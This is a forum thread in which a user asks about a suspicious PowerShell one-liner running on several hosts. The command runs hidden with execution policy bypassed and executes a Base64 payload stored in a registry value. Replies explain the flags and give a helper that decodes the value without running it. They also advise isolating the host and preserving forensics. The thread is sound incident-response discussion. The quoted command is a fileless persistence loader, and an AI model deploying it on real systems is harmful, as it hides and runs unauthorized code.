July 26, 2019 at 3:07 am #167803 (Participant, Rank: Member)
Any PowerShell experts? I could use your help.
I have this script below that is running on multiple hosts, and I am wondering if you can tell me what it means or does?
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -version 2 -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp "HKLM:\SOFTWARE\Microsoft\Powershell").ScriptInit)));
July 26, 2019 at 3:26 am #167875 (Participant, Rank: Member)
What is the value in the ScriptInit registry key?
Looks like it is invoking a command which is encoded in the ScriptInit key.
I also did a Google search, and it points to something malicious.
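As an added example (not code from anyone in this thread): the one-liner in the first post reads the ScriptInit value under HKLM:\SOFTWARE\Microsoft\Powershell (gp is the alias for Get-ItemProperty), Base64-decodes it, and passes the result straight to iex (Invoke-Expression), while -version 2 selects the legacy 2.0 engine, -noprofile skips profile scripts, -windowstyle hidden hides the console and -executionpolicy bypass ignores the execution policy. The helper below retrieves and decodes that same value for review without executing it; the output path and function name are my own assumptions.

```powershell
# Added triage helper, not from the thread. It does what the suspicious
# one-liner does up to the decode step, and then STOPS: nothing is passed to
# Invoke-Expression. The decoded text is saved for the security team to read.

function Get-DecodedScriptInit {
    [CmdletBinding()]
    param(
        # Registry key and value targeted by the command in the original post
        [string]$KeyPath   = 'HKLM:\SOFTWARE\Microsoft\Powershell',
        [string]$ValueName = 'ScriptInit',
        # Where to save the decoded script for offline review (assumed path)
        [string]$OutFile   = "$env:TEMP\ScriptInit_decoded.txt"
    )

    # Read the raw value; -ErrorAction Stop makes a missing key/value catchable
    try {
        $raw = (Get-ItemProperty -Path $KeyPath -Name $ValueName -ErrorAction Stop).$ValueName
    } catch {
        Write-Warning "Value '$ValueName' not found under $KeyPath on this host: $_"
        return $null
    }

    # Same decode as the one-liner ([Convert]::FromBase64String + ASCII.GetString),
    # but the result is kept as data instead of being executed
    try {
        $bytes   = [Convert]::FromBase64String($raw)
        $decoded = [Text.Encoding]::ASCII.GetString($bytes)
    } catch {
        Write-Warning "Value is not valid Base64 (raw length $($raw.Length)): $_"
        return $null
    }

    # Preserve evidence: raw and decoded forms, plus a hash so the file can be
    # referenced in a ticket without re-reading the host
    $report = @('=== RAW (Base64) ===', $raw, '', '=== DECODED ===', $decoded)
    Set-Content -Path $OutFile -Value $report -Encoding UTF8
    $hash = (Get-FileHash -Path $OutFile -Algorithm SHA256).Hash
    Write-Host "Decoded $($bytes.Length) bytes to $OutFile (SHA256 $hash)"

    # Return the decoded text for inspection; never feed it to iex
    return $decoded
}

Get-DecodedScriptInit
```

Run it in an elevated PowerShell session on an isolated copy or snapshot of the host where possible; reading the value does not change the registry.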
July 28, 2019 at 4:05 am #168151 (Participant, Rank: Community Hero)
If you did not write and deploy it, and/or no one you are aware of did so, or it was not part of some package you purchased, then the default security process is to fail closed / disconnect it from the network / isolate the device / do not tamper with it or you ruin forensics / not trusted / kill it, period. Send it to your risk management / security team for review, as a simple text file, or bring them to the system that has it.
If you don't know what a script is doing, then don't allow it to run.
All audit modes should be leveraged.
July 28, 2019 at 1:30 pm #168181 (Participant, Rank: Participant)
Is your system managed by any MSP software like Kaseya or ConnectWise?